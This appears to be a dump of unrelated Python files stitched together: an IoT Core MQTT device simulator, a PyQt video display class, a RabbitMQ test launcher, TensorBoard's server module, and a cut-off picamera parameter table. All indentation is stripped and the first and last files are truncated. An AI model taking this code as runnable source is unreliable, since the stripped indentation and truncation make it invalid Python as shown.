# List of allowable statuses: Idling, Moving, Stuck, Frozen, Picked Up, Task Completed
self.listOfStatus = ["Idling", "Moving", "Stuck", "Frozen", "Picked Up", "Task Completed"]
self.status = "Idling"
self.taskQueue = []
self.task = ""
self.deviceId = deviceId
def setup_telemetry_data(self):
# dateTime = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# timeZone = time.strftime("%Z", time.gmtime())
timeStamp = "{}".format(datetime.now().astimezone().isoformat(timespec='minutes'))
# objects = ["Person", "Dog", "Wall", "Car", "Cat", "Cups", "Scissors", "Pen", "Bicycle"]
tasks = ["Location A", "Location B", "Location C", "Location D", "Location E", "Location F", ""]
noOfObjects = random.randint(0, 5)
# objectsDetected = random.choices(objects, k=noOfObjects)[0]
self.status = random.choices(self.listOfStatus, k=1)[0]
self.task = random.choices(tasks, k=1)[0]
if self.status == "Frozen":
if noOfObjects <= 4:
self.status = "Moving"
if self.status == "Stuck":
self.status = "Moving"
mockdata = {"TimeStamp":timeStamp,"Device": self.deviceId, "No_Of_Objects":noOfObjects, "Status":self.status, "Task":self.task}
print(mockdata)
return json.dumps(mockdata)
def performTask(self):
# Runs in a worker thread (started from update()); each queued task is
# simulated by sleeping for 10-20 seconds before reporting it as current.
for pTask in self.taskQueue:
taskPeriod = random.randint(10, 20)
time.sleep(taskPeriod)
print("Performing Task: {}".format(pTask))
self.task = pTask
return
def update(self):
"""This function will update the variables
"""
if self.status == "Idling":
taskThread = threading.Thread(target=self.performTask)
taskThread.start()
return self.setup_telemetry_data()
def wait_for_connection(self, timeout):
"""Wait for the device to become connected."""
total_time = 0
while not self.connected and total_time < timeout:
time.sleep(1)
total_time += 1
if not self.connected:
raise RuntimeError('Could not connect to MQTT bridge.')
def on_connect(self, unused_client, unused_userdata, unused_flags, rc):
"""Callback for when a device connects."""
logging.debug('Connection Result: %s', error_str(rc))
self.connected = True
def on_disconnect(self, unused_client, unused_userdata, rc):
"""Callback for when a device disconnects."""
logging.debug('Disconnected: %s', error_str(rc))
self.connected = False
def on_publish(self, unused_client, unused_userdata, unused_mid):
"""Callback when the device receives a PUBACK from the MQTT bridge."""
print('Published message acked.')
def on_subscribe(self, unused_client, unused_userdata, unused_mid,
granted_qos):
"""Callback when the device receives a SUBACK from the MQTT bridge."""
print('Subscribed: ', granted_qos)
if granted_qos[0] == 128:
print('Subscription failed.')
def on_message(self, unused_client, unused_userdata, message):
"""Callback when the device receives a message on a subscription."""
payload = message.payload.decode('utf-8')
print('Received message \'{}\' on topic \'{}\' with Qos {}'.format(
payload, message.topic, str(message.qos)))
# The device will receive its latest config when it subscribes to the
# config topic. If there is no configuration for the device, the device
# will receive a config with an empty payload.
if not payload:
return
structuredData = json.loads(payload)
if "Task" in structuredData:
self.taskQueue.extend(structuredData["Task"])
if "Deactivate" in structuredData:
if structuredData["Deactivate"] == True:
self.running = False
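# Illustrative only: a config payload pushed from the cloud side might look
# like {"Task": ["Location A", "Location B"], "Deactivate": false}, which
# queues two tasks for on_message() above; {"Deactivate": true} stops the
# main publishing loop.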
def parse_command_line_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description=(
'Example Google Cloud IoT Core MQTT device connection code.'))
parser.add_argument(
'--project_id',
default=os.environ.get('GOOGLE_CLOUD_PROJECT'),
help='GCP cloud project name')
parser.add_argument(
'--registry_id',
default=os.environ.get('REGISTRY_ID'),
help='Cloud IoT Core registry id')
parser.add_argument(
'--device_id',
default=os.environ.get('DEVICE_ID'),
help='Cloud IoT Core device id')
parser.add_argument(
'--private_key_file',
default="rsa_private.pem",
help='Path to private key file.')
parser.add_argument(
'--algorithm',
choices=('RS256', 'ES256'),
default="RS256",
help='Which encryption algorithm to use to generate the JWT.')
parser.add_argument(
'--cloud_region',
default='asia-east1',
help='GCP cloud region')
parser.add_argument(
'--ca_certs',
default='roots.pem',
help=('CA root from https://pki.google.com/roots.pem'))
parser.add_argument(
'--mqtt_bridge_hostname',
default='mqtt.googleapis.com',
help='MQTT bridge hostname.')
parser.add_argument(
'--mqtt_bridge_port',
default=8883,
type=int,
help='MQTT bridge port.')
return parser.parse_args()
def main():
args = parse_command_line_args()
# Create our MQTT client. The client_id is a unique string that identifies
# this device. For Google Cloud IoT Core, it must be in the format below.
client = mqtt.Client(
client_id=('projects/{}/locations/{}/registries/{}/devices/{}'
.format(
args.project_id,
args.cloud_region,
args.registry_id,
args.device_id)))
# With Google Cloud IoT Core, the username field is ignored, and the
# password field is used to transmit a JWT to authorize the device.
client.username_pw_set(
username='unused',
password=create_jwt(
args.project_id, args.private_key_file, args.algorithm))
# Enable SSL/TLS support.
client.tls_set(ca_certs=args.ca_certs)
device = Device(args.device_id)
# Handling callbacks from Cloud IoT
client.on_connect = device.on_connect
client.on_publish = device.on_publish
client.on_disconnect = device.on_disconnect
client.on_subscribe = device.on_subscribe
client.on_message = device.on_message
client.connect(args.mqtt_bridge_hostname, args.mqtt_bridge_port)
client.loop_start()
# This is the topic that the device will receive commands on.
mqtt_config_topic = '/devices/{}/config'.format(args.device_id)
# This is the topic that the device will publish telemetry data on
mqtt_publish_topic = '/devices/{}/events'.format(args.device_id)
# Ensure connection in case of unstable internet
device.wait_for_connection(5)
# Listen to the config topic for commands from Cloud IoT Core
client.subscribe(mqtt_config_topic, qos=1)
while (device.running):
payload = device.update()
# Publish "payload" to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
client.publish(mqtt_publish_topic, payload, qos=1)
time.sleep(1)
client.disconnect()
client.loop_stop()
print('Finished loop successfully. Goodbye!')
if __name__ == '__main__':
main()
|
VideoDisplay.py
|
import sys
import time
import cv2
import threading
from PyQt5.QtCore import QFile
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtGui import QImage, QPixmap
# import DisplayUI
# from Camera import Camera
# from multiprocessing import Process
# from SegModel import *
from model.SegModel import SegModel
class Display:
def __init__(self):
self.threads=list()
self.closeToggles=list()
self.currentStates=list()
self.showLabels=list()
# The default video source is a file
self.capdict=dict()
self.frameRatedict=dict()
self.isCamera = False
self.fps=120
self.stopEvent = threading.Event()
self.stopEvent.clear()
self.seg = SegModel()
self.maththread=threading.Thread(target=self.seg.Analysis)
self.maththread.start()
# def reset(self):
# # Set the signal that should trigger shutdown
def FiniSignal(self):
return self.seg.finiSignal
def init(self,LabelList):
self.stopEvent.set()
time.sleep(0.5)
self.stopEvent.clear()
self.showLabels=LabelList
self.closeToggles=[0]*len(self.showLabels)
self.currentStates=["-1"]*len(self.showLabels)
# Get the index of an available display label
def GetCurrentLabelIndex(self):
index = 0
for state in self.currentStates:
if state == "-1":
return index
index += 1
return -1
def GetLabelIndexByID(self, ID):
index = 0
for state in self.currentStates:
if state == ID:
return index
index += 1
return -1
def Open(self,Camera,CID):
index=self.GetCurrentLabelIndex()
self.capdict[index] = cv2.VideoCapture(Camera.GetUrl())
self.frameRatedict[index]=self.capdict[index].get(cv2.CAP_PROP_FPS)
# Create the video display thread
self.currentStates[index]=CID
th = threading.Thread(target = self.Display,args=(index,))
th.start()
def Close(self,index):
self.closeToggles[index]=1
def CloseAll(self):
# Set the stop event to end video playback
self.stopEvent.set()
self.seg.stopEvent.set()
def Display(self,index):
showLabel=self.showLabels[index]
count=0
while self.capdict[index].isOpened():
success, frame = self.capdict[index].read()
if success is False:
print("Ended")
break
count+=1
if count%self.fps==0:
cv2.imwrite('images/'+self.currentStates[index] +"_"+ str(count) + '.png', frame)
# Swap colour channel order for QImage display (RGB <-> BGR)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
img = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888)
showLabel.setPixmap(QPixmap.fromImage(img))
if self.isCamera:
cv2.waitKey(1)
else:
cv2.waitKey(int(1000 / self.frameRatedict[index]))
# Check whether the close toggle for this label has been set
if self.closeToggles[index]==1:
self.closeToggles[index] = 0
self.currentStates[index] = "-1"
self.capdict[index].release()
break
if self.stopEvent.is_set():
# Reset the close event and clear the display label
break
|
test_os_run.py
|
import os
import threading
for i in range(8):
threading.Thread(target=os.system,args=('python test_rabbitmq_consume.py',)).start()
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import re
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import io_wrapper
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if uri_pattern.match(specification) is None and \
':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
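# Illustrative only (not part of the original module): a hypothetical call such
# as ParseEventFilesSpec('train:/tmp/train,/tmp/eval') would return
# {'/tmp/train': 'train', '/tmp/eval': None} on a POSIX system, assuming neither
# path is a symlink (os.path.realpath would otherwise rewrite it).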
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port, logdir):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
logdir: The logdir argument string that tensorboard started up with.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir)
return ThreadedHTTPServer((host, port), factory)
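# Illustrative usage sketch (not part of the original module); the
# EventMultiplexer construction below is an assumption about its usual
# interface, and '/tmp/logs' is a placeholder path:
#
#   multiplexer = event_multiplexer.EventMultiplexer(
#       size_guidance=TENSORBOARD_SIZE_GUIDANCE)
#   path_to_run = ParseEventFilesSpec('/tmp/logs')
#   StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval=60)
#   server = BuildServer(multiplexer, 'localhost', 6006, '/tmp/logs')
#   server.serve_forever()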
|
mmalobj.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANALOG_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BLACK_LEVEL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CCM_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
# mmal.MMAL_PARAMETER_CROP: mmal.MMAL_PARAMETER_CROP_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
# mmal.MMAL_PARAMETER_CUSTOM_CCM: mmal.MMAL_PARAMETER_CUSTOM_CCM_T,
mmal.MMAL_PARAMETER_DIGITAL_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LENS_SHADING_OVERRIDE: mmal.MMAL_PARAMETER_LENS_SHADING_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_OUTPUT_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
# mmal.MMAL_PARAMETER_RESIZE_PARAMS: mmal.MMAL_PARAMETER_RESIZE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
